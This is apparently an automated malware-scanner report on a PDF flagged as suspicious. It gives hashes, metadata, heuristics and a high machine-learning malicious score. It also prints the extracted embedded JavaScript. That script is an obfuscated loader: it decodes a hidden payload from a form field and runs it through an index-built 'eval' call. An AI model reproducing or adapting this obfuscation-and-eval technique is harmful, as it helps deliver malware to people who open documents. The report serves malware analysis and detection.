PDF static analysis report

Static analysis result for SHA-256 d650c74812f30dc8…

SUSPICIOUS

PDF

33.1 KB Created: 2012-08-07 10:10:40 +04:00 Authoring application: Adobe Acrobat 7.0 (via Adobe Acrobat 7.0 Image Conversion Plug-in) First seen: 2026-05-08
MD5: 4656a55dbb78538214ee3f7c2f257ea8 SHA-1: 6397647b0fc3a43accfc8f3fb8723702f47e6968 SHA-256: d650c74812f30dc858502cdf2e16f08fc9164f6d25d924682a17144b347e66f4
48 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9971

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0106_000.js pdf-javascript-stream PDF /JS object 106 at offset 0x7F0F 3028 bytes
SHA-256: 930e614c73798c7407f6d1c185addc21542665fb37828d8b98fc8ceb7d65bdbc
Preview script
First 1,000 lines of the extracted script
var adgwqgfasdfasdfa="354G291G342G96G213G177G"+"306G351G330G2"+"97G348G315G333G330"+"G96G312G303G360"+"G150G294G315G3"+"30G120G342G303"+"G345G123G96G369"+"G30G96G96G96"+"G96G354G291G3"+"42G96G315G177G"+"30G96G96G96G96"+"G354G291G342G9"+"6G309G96G183G96G23"+"1G291G348G312G138"+"G342G333G351G33"+"0G300G120G342G"+"303G345G138G3"+"24G303G330G309"+"G348G312G141"+"G156G123G177G30G"+"96G96G96G96G3"+"15G306G96G120G3"+"09G96G99G183G96G"+"120G342G303G345G1"+"38G324G303G330G3"+"09G348G312G141G"+"156G123G123G96G"+"342G303G345G96"+"G183G96G342G303"+"G345G96G129G9"+"6G102G144G144G102G1"+"77G30G96G96G96G"+"96G354G291G34"+"2G96G333G351G348"+"G96G183G96G102G102G177"+"G30G96G96G96G96"+"G306G333G342G96G1"+"20G315G183G144G177G9"+"6G315G180G342G"+"303G345G138G32"+"4G303G330G309G3"+"48G312G177G96G315G129"+"G183G156G123G96G369G"+"30G96G96G96G96G96G96G9"+"6G96G333G351G34"+"8G96G183G96G333"+"G351G348G96G12"+"9G96G102G111G351G"+"102G96G129G96"+"G342G303G345G13"+"8G345G351G294G"+"345G348G342G12"+"0G315G129G150G13"+"2G150G123G96"+"G129G96G342G"+"303G345G138G345"+"G351G294G345G348G"+"342G120G315G132G1"+"50G123G177G30G96G"+"96G96G96G375G3"+"0G96G96G96G96G3"+"42G303G348G3"+"51G342G330G96"+"G351G330G303G"+"345G297G291G336"+"G303G120G333G351G"+"348G123G177G30G"+"375G30G30G306G35"+"1G330G297G348G315G33"+"3G330G96G360G33"+"3G342G120G345G348G3"+"42G132G321G303G363G123"+"G96G369G30G27G354G29"+"1G342G96G333G351G"+"348G336G351G348G96G18"+"3G96G117G117G17"+"7G30G27G354G291G342"+"G96G330G303G360G"+"348G96G183G96G"+"117G117G177G30G27G3"+"54G291G342G96G"+"324G303G330G309G348G"+"312G96G183G96G34"+"5G348G342G138G324"+"G303G330G309G348"+"G312G177G30G27G306G333"+"G342G120G354G291G3"+"42G96G315G96G183G96G144"+"G177G96G315G96G180"+"G96G324G303G330G3"+"09G348G312G177G9"+"6G315G129G129G123G9"+"6G369G30G27G27G3"+"30G303G360G348G96"+"G183G96G336G291G3"+"42G345G303G219"+"G330G348G120G3"+"21G303G363G28"+"2G345G348G342G1"+"38G297G312G29"+"1G342G201G333G300"+"G303G195G348G120G3"+"15G123G123G138G"+"348G333G249G34"+"8G342G315G330G"+"309G120G147G162"+"G123G177G30G27G"+"27G315G306G120G3"+"30G303G360G348G1"+"38G324G303G330G3"+"09G348G312G96G180G96"+"G150G123G96G330"+"G303G360G348G96"+"G183G96G102G144"+"G102G129G330G303"+"G360G348G177G30G2"+"7G27G333G351G"+"348G336G351G348G96G"+"129G183G96G330G303G3"+"60G348G177G30G"+"27G375G30G27";
var gqasdfasdfas = ':'+'ABCDEFGHIJKLMNOPQRSTUVWXYZ{} ()[]^abcdefghijklmnopqrstuvwxyz_0123456789/!%+-*.,;"=<>&'+'\\';
function xcvafsdfasf(text){
var decryptedText="";
var ln = text.length;
for (var i = 0;i<ln-1;i++)
{
decryptedText += zxcbnasfsdf(text[i]);
}
return decryptedText;}
function zxcbnasfsdf(cryptSymbol){
var symbol="";
var posSymbol=gqasdfasdfas.indexOf(cryptSymbol)-2;
if (posSymbol<0)
{posSymbol=posSymbol+gqasdfasdfas.length;}
symbol=gqasdfasdfas.charAt(posSymbol);
return symbol;}
var b2=getField("Text1");
var fgbfdg43wgwefewf=b2.value;
function gasdasd(sads){
var d="dafefasdfadsvasdfas";
var c="fsadfewfasldfwaefasd";
app[d[3]+d[12]+c[2]+c[10]](sads);
}
gasdasd(xcvafsdfasf(fgbfdg43wgwefewf));